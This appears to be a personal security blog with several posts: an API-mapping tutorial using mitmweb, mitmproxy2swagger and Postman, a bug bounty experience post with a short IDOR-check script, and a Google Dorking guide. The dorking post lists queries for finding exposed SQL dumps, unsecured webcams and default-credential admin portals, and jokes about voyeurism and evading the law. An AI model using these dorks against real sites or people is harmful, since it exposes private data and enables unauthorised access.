    And that’s it!

    I know, pretty underwhelming right? But that’s the point! My methodology may be simple but it’s flexible, which is extremely important in the field of cybersecurity.

Being simple also makes me a more effective bug hunter because I’m focused on the fun parts instead of the parts that make hunting feel like a chore. Having fun while hunting makes me more motivated, and following my intuition and curiosity makes me dig deeper into the application to find bugs that automation would normally miss.

    Of course, this is the method that works for me. You might be fine with letting tooling do the heavy lifting. One thing is for sure, though: if you’re not having fun, you’re doing it wrong!

  • How To Reverse Engineer API’s To Boost Your Bug Bounty Workflow

    How To Reverse Engineer API’s To Boost Your Bug Bounty Workflow

    Recently, I’ve been working on APIsec University’s  API Penetration Testing Course, where I’ve learned some invaluable methods of API hacking. One of the coolest things I’ve learned is how to effectively map out an API. So, in this post, I’m going to pass on what I’ve learned to you.

    Why waste time mapping an API?

    To some, bothering to map out the routes of an API can seem like a waste of time. But I assure you, taking the extra time to discover and organize the hidden functionality of an application is well worth the extra effort—and with the method I’m going to teach you, it’ll be a snap!

    Web apps are complex!

Today’s web content is rapidly becoming pretty advanced. It seems that the need for desktop applications is coming to an end as they shift to being hosted on the web. From email clients and note-taking apps to online IDEs and video game streaming—anything can be done on the web!

To implement this complex functionality, web applications need an equally complex API. Examining these APIs can quickly get overwhelming. If you rely only on tools like Burpsuite or ZAP, you’ll quickly find yourself drowning in requests. It can also be hard (at least in my experience) to organize these routes in a way that allows you to quickly go back and reexamine important discoveries.

    This complexity is a turn-off for most. I mean who wants to spend time digging through a bunch of messy JSON!?

    APIs are juicy!

Dealing with confusing APIs is worth it because they are a goldmine for bug hunters.

All of the functionality of a web application is handled through APIs. Handling user data, logins, storing your Google Docs—it’s all done with the magic of APIs! That’s why I seek them out, and that’s why you should too.

Like I mentioned earlier, APIs are complicated and not super interesting upfront. Most people like to go after what they can see in front of them or what automated scanners can pick up. So, if you’re a bug bounty hunter, interacting with APIs that require authenticated access could be your ticket to some bugs. More often than not, these bugs are going to be critical, as APIs often deal with sensitive data.

So, without further ado, let’s get you on the fast track to exploring APIs!

    My Methodology

    Keep in mind that this is my way of doing things. What works for me may not be the best for you. So, feel free to follow my advice as loosely (or closely) as you want!

    Having a click-around

    The first thing I like to do whenever I approach an application is having a good old-fashioned click-around.

I click on links and buttons, fill out forms, make a user account, log in—everything that a normal user is expected to do. All the while, I pay attention to the overall functionality of the app. Is it a note-taking app? A job board? An online store? etc…

    While doing this, I keep my browser’s dev-tools open to see how the application is handling what I’m doing. The app can have a specific route for handling API requests, like /api/v2/, /user-api/, /content-manager/…you get the idea. It can even have separate domains for handling function calls, like api.example.com, example-api.com, the list goes on…

Knowing where requests are being made to is crucial in the next steps. We only want to target specific APIs, so we need to know how to filter the traffic we gather later on.

    The point of all this is not to get to hacking the app. I actually do the opposite here by using it as intended. Knowing what the application normally does will help me to understand how I can exploit it into doing abnormal things later. Knowledge is power.

    Of course, you can go as deep or as shallow into the application as you want. It depends on your workflow. But, don’t sleep on this step! It might save you tons of time backtracking in the future.

    Click-around v2

    This second click-around is where all the magic happens. Now, we’re going to proxy all of our traffic using mitmweb which is a part of the mitmproxy suite of tools. If you don’t have mitmproxy, I highly suggest installing it.

    mitmweb --listen-host 192.168.186.93 --web-host 192.168.186.93
    [13:51:03.580] HTTP(S) proxy listening at 192.168.186.93:8080.
    [13:51:03.582] Web server listening at http://192.168.186.93:8081/
    [13:51:03.851] No web browser found. Please open a browser and point it to http://192.168.186.93:8081/

I have mitmweb running on my Kali Linux virtual machine in VMware. By default, mitmweb runs the proxy and web interface on localhost. I like to set the host to the address of my virtual machine (192.168.186.93) so I can access it from my host machine. This is because I like to do everything that needs graphics on my host machine and run Kali without a desktop so it is as low-impact as possible. I find this makes my experience on my laptop a bit smoother.

Anyways…now that we’ve got the proxy up and running in Kali, I pop open a web browser and proxy its traffic through mitmweb. I’m going to target Reddit. From my earlier click-around, I know that their login API is routed under www.reddit.com/api, while actions such as upvotes seem to be handled by oauth.reddit.com/api. Knowing that, I’m going to focus on the second route and click around!

After some light clicking around, a ton of requests can be seen in the web UI, which runs on port 8081 by default.

My browser of choice is Firefox. I like its dev tools, and the FoxyProxy browser extension conveniently allows me to switch between proxies.

Let’s download the requests we want to keep as a flow file so I can examine them.

    I like to use the highlight bar (the input under the search bar) to highlight only the routes I need. Then I click File and finally, Save filtered to grab only the relevant requests.
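Both the search and highlight inputs accept mitmproxy’s filter expressions. For example, to match only the Reddit oauth API traffic from earlier, I’d type something like:

~d oauth.reddit.com & ~u /api/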

I find that saving only the necessary routes dramatically reduces the size of the flow file. Without doing this, mitmproxy2swagger (the tool we’re going to use to process the flow file) might hang if the file is too big.

    Converting the flow file

    The next step is to convert this flow file into a YAML file that other tools can read. To do this, I’m using a tool called mitmproxy2swagger.

    After copying the flow file over to my Kali machine, I run mitmproxy2swagger like so:

    ┌──(walter㉿kali)-[/tmp]
    └─$ mitmproxy2swagger -i flows -o spec.yml -p "https://oauth.reddit.com" -f flow
    No existing swagger file found. Creating new one.
    [▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌] 100.0%[warn] flow without response: http://192.168.186.93:8081/flows/dump?filter=oauth.reddit.com/api
    Done!

    Let’s break this down:

    • -i specifies the input file (in this case our flows file)
    • -o is the output file. We want to name it spec.yml so that mitmproxy2swagger recognizes it on pass 2 (notice it said it didn’t find a swagger file)
    • -p is the URL we want to parse
    • -f is the format. In this case, it’s the flow format but HAR files are also accepted

    We’re not done with mitmproxy2swagger just yet. First we need to edit our spec.yml file to tell it which routes to process. My spec.yml file looks like this:

    openapi: 3.0.0
    info:
      title: flows Mitmproxy2Swagger
      version: 1.0.0
    servers:
    - url: https://oauth.reddit.com
      description: The default server
    paths: {}
    x-path-templates:
    # Remove the ignore: prefix to generate an endpoint with its URL
    # Lines that are closer to the top take precedence, the matching is greedy
    - ignore:/api/jail/asknicely
    - ignore:/api/multi/user/CommunityAdoptionBot/m/adoption_week/
    - ignore:/api/send_verification_email
    - ignore:/api/submit
    - ignore:/api/trending_searches_v1.json
    - ignore:/api/v1/draft
    - ignore:/api/v1/external_account/user/SpareBobcat1406.json
    - ignore:/api/vote

    Notice the comment that tells us to remove ignore tags before the route. All of those routes look interesting to me so I’ll go ahead and remove all of them:

    openapi: 3.0.0
    info:
      title: flows Mitmproxy2Swagger
      version: 1.0.0
    servers:
    - url: https://oauth.reddit.com
      description: The default server
    paths: {}
    x-path-templates:
    # Remove the  prefix to generate an endpoint with its URL
    # Lines that are closer to the top take precedence, the matching is greedy
    - /api/jail/asknicely
    - /api/multi/user/CommunityAdoptionBot/m/adoption_week/
    - /api/send_verification_email
    - /api/submit
    - /api/trending_searches_v1.json
    - /api/v1/draft
    - /api/v1/external_account/user/SpareBobcat1406.json
    - /api/vote

I edited the file in vim and used the command :%s/ignore://g to quickly replace all instances of ignore: with an empty string. If that doesn’t make sense to you, maybe I’ll have to make a vim tutorial in the future…

    With the ignores removed in the right places, I’ll run mitmproxy2swagger once more:

    ┌──(walter㉿kali)-[/tmp]
    └─$ mitmproxy2swagger -i flows -o spec.yml -p "https://oauth.reddit.com" -f flow --examples
    [▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌] 100.0%[warn] flow without response: http://192.168.186.93:8081/flows/dump?filter=oauth.reddit.com/api
    Done!

You’ll notice I added the --examples flag at the end. That tells mitmproxy2swagger to include example data from the flow file (like the body of a POST request) so I can get an idea of how to re-create the request in the future.

The last step is to validate the spec and export a clean YAML file. So, head on over to https://editor.swagger.io/ so we can upload our spec.yml file. Select File > Import file to upload your spec.yml. Mine looked like this:

    Now click File again and then Save as YAML to export it to yaml.

    We did it! The grunt work is over. We can now begin testing our API using other tools.

    Enter Postman!

Pun intended…Postman is my favorite tool for the job when testing an API, for several reasons. Let’s go through part of my initial workflow so you can see why.

    First, I open up a fresh workspace. I usually create a separate workspace for each of my bug bounty targets to keep everything organized. Then, it’s as easy as clicking the import button in the top left and importing your YAML file from earlier. Here’s what mine looked like after I imported it:

    And Postman auto-magically organizes everything in nested folders for me!

One of the first things I do when testing APIs is see how routes respond without any authentication. The collection runner makes this a snap! Click on the collection (the top-most folder), go to the Tests tab, then select one of the test snippets to get started fast.

I like to use the status code 200 test to weed out routes that don’t require any authentication, but you can edit the code and customize the cases. Then, it’s time to run the collection by clicking the Run button in the upper right.

    This takes you to a new window where you can deselect uninteresting routes. I like to deselect all of the OPT routes so I can focus on the ones that matter.

    Then hit run and Postman will automatically run every request.

As you can see, all 9 of the routes I collected failed with 403 errors, which was expected since I was authenticated as a user when I proxied them. But this is a good first step to take when testing an API, and Postman makes it so easy!

    And there’s so much more it can do! You can create variables, import/export curl commands, write scripts that run before each request, save your Workspace to the cloud to access it from anywhere, proxy requests to other tools (like Burpsuite)…all FOR FREE!

    So, I highly encourage you to add this tool to your pentesting toolkit!

    Conclusion

Having a click-around, using mitmweb to proxy requests, feeding the results to mitmproxy2swagger and editor.swagger.io, and finally importing the resulting YAML file into Postman is a great way to map APIs.

APIs can be daunting in their complexity. This approach will help you organize the functionality of a web application a lot better.

    It’s also worth noting that if API Documentation exists, you should read it to supplement your findings. It’ll be boring but worth it in the end. Good bug hunters are smart bug hunters.

You can also check out the documentation on the Wayback Machine to see if any old routes are still supported.

    Thanks for reading and I hope this makes you a better hacker!

  • My Bug Bounty Experience

    My Bug Bounty Experience

Lately, I’ve been spending quite a bit of time learning web hacking and practicing what I’ve learned on bug bounty programs. For those of you unfamiliar with bug bounty programs, they are programs hosted by companies that provide payouts for vulnerabilities found on their platforms. Payouts vary depending on the criticality of the vulnerability, and some programs offer no monetary rewards at all. Essentially, when you’re a bug bounty hunter, you’re a penetration tester that’s working for free until you submit a security flaw.

The main reason I decided to try my hand at bug bounty hunting is that I wanted to gain hacking experience to prepare me for a career in penetration testing. I also love learning techniques and picking apart web applications. However, finding vulnerabilities was not as easy as I thought it would be. So, in this post, I’m going to share some things I picked up while bug bounty hunting.

    It’s tough…

Bug bounty hunting is hard. Sure, it’s fun to be able to dig through a web application and see things that you normally wouldn’t see when using a web page as intended. I had loads of fun finding developer login pages and weird API routes. Finding bugs that were actually exploitable was another story.

    You have to compete

When you join a public bug bounty program, you’re competing with hundreds or even thousands of other hackers who may be way more experienced than you. That means the application has most likely been picked clean of the easier bugs that automated scanners can detect. I ran into my fair share of duplicates when I first started out, which was definitely a disappointment. It’s not nice when you take the time to document your submission only for it to be shut down by Hackerone because some other hacker beat you to it.

    The competition factor definitely makes the experience more difficult. However, there are some ways to help limit the competitive aspect.

    1. Choose a good target

    Choosing a target really depends on you. Your preferences, your strengths, and what you are interested in can all be factors in deciding what target you should spend time on. But when you are just starting out, there are some things that can help point you in the right direction. For example, choosing a target with a small payout (or none at all) makes it less likely that tons of money-hungry hackers are going after it.

    I would also recommend going after a target that has a medium scope. When you’re first starting out, something with a couple of wildcard domains is great. That leaves plenty of opportunity for you to find tons of subdomains and interesting corners of the application. Don’t go too big, though. You can quickly get overwhelmed by the amount of information automated scanners pull up on the target, and it might take a long time for the scanners to process all of the subdomains they find.

    I experienced a similar situation when doing recon on ABB. They had 7 assets in scope (all wildcard domains), which seemed like a small number at the time, but I was quickly overwhelmed by the number of subdomains and URLs returned to me. I also spent a lot of time waiting on scan results, which wasn’t exactly fun.

    Most importantly, you should choose a target that interests you. Most likely, you’re going to have to spend a lot of time digging through an application to find any vulnerabilities. If you choose an application you’re not interested in, you might get bored before you do any deep digging that could lead to serious bugs.

    2. Find programs with private invites

    Platforms like Hackerone, Intigriti, and Bugcrowd are fantastic because they give you the option to join bug bounty programs that aren’t listed publicly. The way this works varies from platform to platform. In Hackerone’s case, all you have to do is complete a few CTF challenges and sign up for MFA, and you get your first invite. To get more, though, you have to submit your first valid bug.

    I was able to get my first invite with Hackerone but quickly got bored with the small scope of the target I was invited to hunt on. So, I’ve dedicated most of my time to finding bugs that will earn me more interesting invites. At the time of this writing, my first submission is under review by the company, so hopefully I get more invites soon!

    3. Find login pages

    Whenever I do my recon, I intentionally seek out login pages. If the company has a large scope, I look for login pages that differ from the overall application and use older technology. Then, I create an account and check out the application from there.

    This gives me several advantages. For one, this web application is hidden from all the skids that solely rely on automated scanning to throw shit at the wall and see what sticks.

    Number two, applications that require user accounts typically have more functionality than the public-facing application. You can do all sorts of fun things with user accounts, like creating two and seeing if you can access one account’s data from the other (IDOR); a quick sketch of that check follows below. It’s also more likely that there are opportunities for user input and API routes worth digging into.
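
    The IDOR check in particular boils down to a few lines. Here’s a minimal Python sketch of it; the base URL, token, endpoint, and object ID are all hypothetical placeholders for whatever the target actually uses.

    import requests

    BASE_URL = "https://target.example/api"  # hypothetical API base
    TOKEN_A = "eyJ...token-for-account-a"    # placeholder bearer token for account A
    OBJECT_ID_B = "1337"                     # ID of an object owned by account B

    # Request account B's object while authenticated as account A.
    resp = requests.get(
        f"{BASE_URL}/orders/{OBJECT_ID_B}",
        headers={"Authorization": f"Bearer {TOKEN_A}"},
        timeout=10,
    )

    if resp.status_code == 200:
        print("[!] Account A can read account B's object -- possible IDOR")
    else:
        print(f"[ ] Got {resp.status_code}; access control appears to hold")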

    Don’t Give Up

    Bug bounty hunting is going to be discouraging at times. You might go weeks or even months without finding anything. However, even if a site yields nothing, the time you spend digging through it still helps you learn and grow. This is what I kept telling myself, and it’s what kept me motivated to keep going.

    Bug bounty hunting taught me several things that CTFs never could, including how to do effective reconnaissance and what to look for when examining a web application. CTFs always have one (sometimes obvious) path to a flag. With bug bounty hunting, you develop creativity and an intuition that is invaluable in the world of pentesting.

    If your main goal for bug bounty hunting is to get some experience and learn, you’ll never be disappointed. On the other hand, if you’re just doing this for the money, you’re in for a quick burnout.

    These are just a few things I picked up while digging through various applications. What works for me might not work for you. The only way to find what works for you is by participating in programs, which leads me to my next piece of advice.

    Just do them

    I know this is the cliché Nike-slogan part of every self-help guru’s utility belt, but it rings true in this case. Bug bounty hunting is intimidating. It’s hard to know if you have enough knowledge to start diving into real-world applications. The hard truth of the matter is, you never will. Technology is constantly changing, and therefore, so is hacking. So, if you have the mindset that you need to learn a certain number of topics before you dive into bug bounty hunting, you will forever be trapped in that way of thinking.

    Before I started, I had it in my head that I needed to do all of Portswigger’s Web Security Academy courses, all of Hacker101’s CTFs, vulnerable VMs like OWASP’s Juice Shop…you get the idea. If I wasn’t able to do all of these CTFs and labs with ease, how was I supposed to expect myself to find real-world bugs?

    Then there was the YouTube spiral. I found all of these amazing hackers online, like Nahamsec, Tomnomnom, and Jhaddix. They had some incredible methodologies that I wanted to adopt. I wanted to be just as good as them before even starting. Then I’d find tons of bugs, just like them! I cringed writing that… These guys are great because they have been doing it for years. You can’t start hunting for bugs and expect to be as good as the greats right away.

    What also helped me dive in was treating it as a learning experience. You learn as you hunt for bugs. So, I added bug hunting to my regimen of tutorials and CTFs, and before I knew it, I was hooked! And I learned a ton: how to do effective recon, how to reverse engineer APIs, practical fuzzing…and the list will only grow the more I learn.

    It’s also worth reminding yourself that struggling hard is a win in itself. That’s when quality learning occurs.

    Bugs are out there

    It’s easy to doubt yourself when bug hunting. The thinking usually goes something like this: the odds are pretty low you’ll find a bug; most people have already found the easy bugs with automated scanners; all that’s left are difficult bugs that are nearly impossible to find because the application has already been tested thoroughly by the company’s engineers and security researchers; so it’s pretty much pointless to even attempt looking for bugs.

    This thinking is flawed and is known as a scarcity mindset. If you’ve ever worked in a software development environment, you would know that rolling out features and testing them never goes smoothly. Developers are constantly swamped with work and under pressure to meet strict deadlines. The same is true for testers.

    I’ve worked as a Quality Engineer and have experienced cases where quick fixes are unavoidable. It surprised me how often people are willing to cobble something together just to meet a deadline.

    At the end of the day, we’re only human. People are going to make mistakes and overlook obvious flaws. Bugs are actually plentiful. Don’t believe me? Just take a look at the “Hacktivity” stream on Hackerone’s site, or the equivalent on any other bug bounty platform. Even big Fortune 500 companies like Uber and Tesla repeatedly have flaws reported. Moreover, companies are rolling out brand-new features every day, so the attack surface is constantly growing. That’s why a lot of bug bounty experts familiarize themselves with a few companies and stick with them when doing research.

    Conclusion

    If you’re reading this and are thinking about doing bug bounty programs, I highly encourage you to do so. It’s one of the best ways to get real-world experience without having to get a job. I’ve learned so much and have had so much fun in the process. That being said, my experience is my own. You may have a completely different experience than me, so the only way to gauge whether or not bug bounty hunting is for you is to get out there and do it!

  • Google Dorking

    Hello again! In this post, I’m going to go over an extremely
    useful technique security experts often use to gather
    information and uncover unintentionally exposed resources
    by leveraging the power of Google.

    This technique is known as Google Dorking. A Google Dork is
    a search query that uses Google’s advanced query syntax to
    boost the effectiveness of a normal search.

    Even if you’re not security-oriented, these techniques can be
    extremely useful in your daily Googling life. So, let’s get
    into it!

    Introducing…Dork Parameters

    Before we get into some juicy examples, let’s make sense
    of some of the most useful query strings. I’m only going
    to go over some common ones, but you can take a look
    at this article
    for information on all 42 of them.

    Basic syntax

    The basic syntax of an advanced Google query is as follows:

    search term [query-parameter]:[value]

    You can chain as many query parameters as you want together
    to make for some complex search results.

    In addition to this, Google lets you combine search terms with
    the logical operators AND and OR.

    For example, if I wanted to look up the results of pages that included
    information about both dogs and cats I could search for:

    dogs AND cats

    These operators can be chained together and mixed freely,
    offering flexibility and power.

    If you want to limit your searches to exact matches, you can optionally
    add double quotes to your query.

    For example, if I wanted to pull up pages that contained the exact phrase Squirtle is cool, I could search:

    "Squirtle is cool"

    It is also important to remember that query parameters are delimited by
    spaces. So, if you wanted to search for pages titled “Index of,” you would
    have to search

    intitle:"Index of"

    rather than

    intitle:Index of

    The latter would only search for pages with “Index” in their
    title, treating “of” as a separate search term.
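
    To make the quoting and chaining rules concrete, here’s a tiny Python sketch that assembles a dork string. The helper names and sample values are my own; only the parameter:value syntax, space-delimited chaining, and exact-match quoting come from the rules above.

    def exact(phrase: str) -> str:
        """Wrap a phrase in double quotes so Google matches it exactly."""
        return f'"{phrase}"'

    def dork(*parts: str) -> str:
        """Join query parts with spaces, since spaces delimit parameters."""
        return " ".join(parts)

    # Builds: intitle:"Index of" site:example.com
    query = dork(f"intitle:{exact('Index of')}", "site:example.com")
    print(query)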

    Useful Parameters

    Now, let’s get into some important parameters that could make for some
    pretty powerful search results.

    1. site:[value]

    The site parameter limits results to a specific domain. So,
    if I wanted to limit my searches to facebook.com, I would type:

    site:facebook.com

    This can be used to find possible vulnerabilities in a specific company,
    or limit results about a target to social media sites.

    2. inurl:[value]

    The inurl parameter is pretty self-explanatory: it pulls matches
    based on what is in the URL of the result. If I wanted to pull up
    admin pages that might be publicly available, I could search:

    inurl:admin

    This is useful for providing URL matches rather than matches in the
    page itself.

    3. filetype:[value]

    This parameter is used to restrict results based on filetype. For
    example, if I wanted to search for pdf files, I could search:

    filetype:pdf

    This is an especially powerful parameter, since log files and
    configuration files can often be uncovered with it.

    4. intext:[value]

    Using intext allows you to specify matches in the body of a page.
    The body of the page is anything rendered between HTML tags. For
    example, if I wanted to search for blog articles that were about
    pokemon, I could search:

    inurl:blog intext:pokemon

    These are only some of the key query parameters allowed by Google,
    but as you can imagine, they can be combined in clever ways that
    yield powerful results.
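
    As a quick illustration of combining parameters, here’s a small Python sketch (my own example, not from the post) that chains several parameters into one dork and URL-encodes it into a Google search link. The domain and phrase are placeholders.

    from urllib.parse import urlencode

    # site + filetype + intext chained into a single dork
    query = 'site:example.com filetype:pdf intext:"internal use only"'
    print("https://www.google.com/search?" + urlencode({"q": query}))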

    Exploitation Examples

    Now it’s time for some juicy examples! There are tons of well-known
    Google Dorks out there that expose common types of information, and
    of course, you can combine them with your own custom Dorks to find
    some interesting things. You’d be surprised by what people leave
    exposed to the internet. So, let’s get to the examples!

    intext:"index of" ".sql"

    This Dork string can be used to find SQL database files sitting in
    browsable directory listings. This can potentially expose a number
    of database files that you can download and look through on your
    own machine.

    No bueno for the people who have this exposed, as these files can
    contain user information or other private data.

    inurl:viewer/live/index.html

    This Dork can be used to connect to online devices, such as live-streaming webcams. Many webcams are intentionally made to be public, but some might not be.
    If you’re a creep, this can be perfect for you!

    inurl:"admin/default.aspx"

    Using this Dork, you can find default login portals. Oftentimes, login portals
    that are unintentionally exposed will be using default credentials. So, this Dork
    can be used to find potentially vulnerable sites. Use at your own discretion!

    These are only a few of the many powerful Dorks out there. Exploit DB’s
    Google Hacking Database
    has loads of other examples, so I encourage you to experiment with these and
    combine them with your own Dorks.

    It goes without saying that you can stumble upon private information
    and vulnerabilities. So, look, don’t touch! It’s best to contact site
    owners to make them aware of this information. But DO NOT do anything
    illegal (it’s only illegal if you get caught *wink-wink*).

    Anyways, that’s it for this security tutorial. More coming soon!